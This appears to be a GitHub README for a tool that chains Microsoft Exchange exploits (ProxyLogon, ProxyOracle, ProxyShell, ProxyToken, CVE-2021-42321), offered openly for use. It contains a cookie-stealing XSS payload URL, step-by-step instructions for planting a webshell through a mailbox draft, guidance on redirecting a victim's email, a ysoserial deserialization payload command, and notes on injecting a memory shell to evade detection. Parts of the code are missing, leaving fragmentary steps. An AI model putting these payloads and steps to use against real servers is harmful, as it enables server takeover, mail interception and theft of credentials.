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6b80f63 · Dec 1, 2021


208 lines (134 loc) · 11.4 KB

File metadata and controls

208 lines (134 loc) · 11.4 KB


proxylogon, proxyshell, proxyoracle, proxytoken, CVE-2021-42321 Deserialization RCE full chain exploit tool

  1. ProxyLogon: The most well-known and impactful Exchange exploit chain
  2. ProxyOracle: The attack which could recover any password in plaintext format of Exchange users
  3. ProxyShell: The exploit chain demonstrated at Pwn2Own 2021 to take over Exchange and earn $200,000 bounty

ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server! Slides Video

most of the exploit is recoded with golang to speed up... and for learning golang purpose :)

NAME CVE patch time description avaliable
ProxyLogon CVE-2021-26855 Mar 02, 2021 server-side request forgery (SSRF) yes
ProxyLogon CVE-2021-27065 Mar 02, 2021 Microsoft.Exchange.Management.DDIService.WriteFileActivity未校验写文件后缀,可由文件内容部分可控的相关功能写入WebShell yes
ProxyOracle CVE-2021-31196 Jul 13, 2021 Reflected Cross-Site Scripting yes
ProxyOracle CVE-2021-31195 May 11, 2021 Padding Oracle Attack on Exchange Cookies Parsing yes
ProxyShell CVE-2021-34473 Apr 13, 2021 Pre-auth Path Confusion leads to ACL Bypass yes
ProxyShell CVE-2021-34523 Apr 13, 2021 Elevation of Privilege on Exchange PowerShell Backend yes
ProxyShell CVE-2021-31207 May 11, 2021 Post-auth Arbitrary-File-Write leads to RCE yes
proxytoken CVE-2021-33766 July 13, 2021 With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users. As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker. yes
Microsoft Exchange Server 远程执行代码漏洞 CVE-2021-42321 Nov 17, 2021 Exchange Deserialization RCE yes

more exchange exp coming soon...



Once a victim clicks this link, will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/`,{credentials:`include`});//

or use 3gstudent's way:

step1: XSS平台搭建

借助SSRF漏洞,控制Exchange服务器将Cookie信息发送至XSS平台,导致最终想要的Cookie信息位于Request Headers中




  • 修改index.js,使用ajax模拟用户发包触发SSRF漏洞

  • 修改 ,将GET请求的Request Headers进行提取

  • 使用合法的证书


var xmlHttp = new XMLHttpRequest();"GET", "", false);
document.cookie = "X-AnonResource=true";
document.cookie = "";

step2: XSS利用代码


step3: example cookie for decryption test:

cadata=FVtSAAWdOn29HYDQry+kG+994VUdAxONrayi4nbJW9JWTh8yLueD6IxYpahfxcGsA/B3FoVUQOD2EG605SR4QdeQ1pof+KD//6jwpmYQjv/II+OcqChrFZFvcMWv46a5; cadataTTL=eTxCEHKHDMmd/gEqDuOafg==; cadataKey=T4juhN4dUMKY4wkajUD43n4EWfMwefPQlqzxXmK4GnSHIZqo+g+uQg1Y2ogGoD1HyoVpRYgjGcCu6rmNQK+LsaZ8/lfBCThBI5yAhP1W2Fx+YNKvzy8Bcpui7zTlhAY598lE5Aijs6crHVXJeZkbLfMJgp0cFHj5uTQPcg31O/AeOAnD5c27IYOQ7JqMW7GOUVor1lhYnhh0R/NtWWqyfr5oE9j0jbxIGgrQrXIpLxL/uAU1ddC+/5jG9Edpq4sC213amuU/94rkHYzNH9OsiHYIkXr/NmkB7p908XrFrwXAcvV9QieoRiS3jvKCbzk3mnMu3YTnsJwAuiHzSXdCOQ==; cadataIV=GB9B+rwrigyPOf8xnV1KAek++yovEot9jFcV68WepCTQoRtQ5HUxSC7tE1mmHg0YtE6EOZNUM/WiNGP6xI4UTAofcMOfTLeRpBzeaKOETfjxKK2W7IKn+9k2tRkc1pIlO8FTOVx/dOHOoIFHUkqxFr+TgBULJ1I7tUmO7W0XDX4ZJHfmQhVqOOzeyjImKdX7Uv/jIJrF4VEew7rgvrC8BhqOqWgaTxpGhDTzIXl+wW3crsgZmXpXhOPURej1iwmtvhuQU6iuq4/IRv0lVIW3WvP6gUI8owIUxppnJl7YmN27Aqkjs0nTZZz1LBuZN+YxY4x6Lvs2FMG68jllhE4kwg==; cadataSig=BOJSYN2B+3RsXjO2akh3mqlKKkeAZVamOzfpVo0QdPEA3BHjpR6ls5yD9TzAQzRuWJJaaRIm7wMEiBMFz/sK5jk3R6kWw1OmMtJN2c38PdvwGIe6/7ByJdl52a5ojhDrRZhc4Qc3y+FFRx6XKvqUljTRWtHJGI1Jad2+LiNhJGkalhUeTM/a2V4LiQWf6Vv1KzJO79rZuOOOBnatht/E29j6636FpllCfEKrrogPQ7ADdVS6OOmqNU9gRMVgKnomC2t2PCtuYj26HUjnZ3rfc6BdzVmtu9EYSzccObsB2jxXXclAm5a+NZU/6sj9tlq3gcurjBl9yUDTgbZLg383gw==
  • amd64 poc binary usage:

  • just a modyfied version of padre, added proxyoracle detect poc code...

  • python script exp usage:

Decrypt this cookie to plaintext:


  • CVE-2021-34473 - Pre-auth Path Confusion

This faulty URL normalization lets us access an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and we could manipulate only the path part of the URL, it’s still powerful enough for us to conduct further attacks with arbitrary backend access.[email protected]
  • CVE-2021-34523 - Exchange PowerShell Backend Elevation-of-Privilege
  • CVE-2021-31207 - Post-auth Arbitrary-File-Write

let's getting started...

generate proxyshell specified webshell payload.


just put the webshell content you want to "webshell", then it will be fine...

then put the encoded webshell to <t:Content>...</t:Content> in chkproxyshell.go

confirm proxyshell and get the sid value to generate token.

use the following py script to gen token value

confirm the token is valid

now use the token to send a email with shell attachment in, this may be saved as a draft in administrator's mailbox...

finnaly use the following wsman python script to export The draft to webshell :)


  • -te: is the email that you want to redirect to...

  • -ve: is the email that you want to attack and read...

Exchange RCE CVE-2021-42321 (target user & pass needed exploit)

Exchange 2016 CU 21,22 and Exchange 2019 CU 10,11. This means the only recent latest version of Exchange 2016,2019 are vulnerable to this CVE

  1. Create UserConfiguration with BinaryData as our Gadget Chain
  2. Request to EWS for GetClientAccessToken to trigger the Deserialization

change DisableActivitySurrogateSelectorTypeCheck to True to overcome the limitation of .NET and later inject DLL to achieve mem-shell with Jscript to bypass the detection


use generate the command execution payload...

./ysoserial.exe -f BinaryFormatter -g ActivitySurrogateDisableTypeCheck -o base64 -c "whoami /all" -t

then replace USER, PASS, target, gadgetData1 fileds you want...

  • youtube channel exp prove:

i'm not found a proper envirenment to test the test it yourself.

more newest exchange exp coming soon......

Reference (worship to orange!)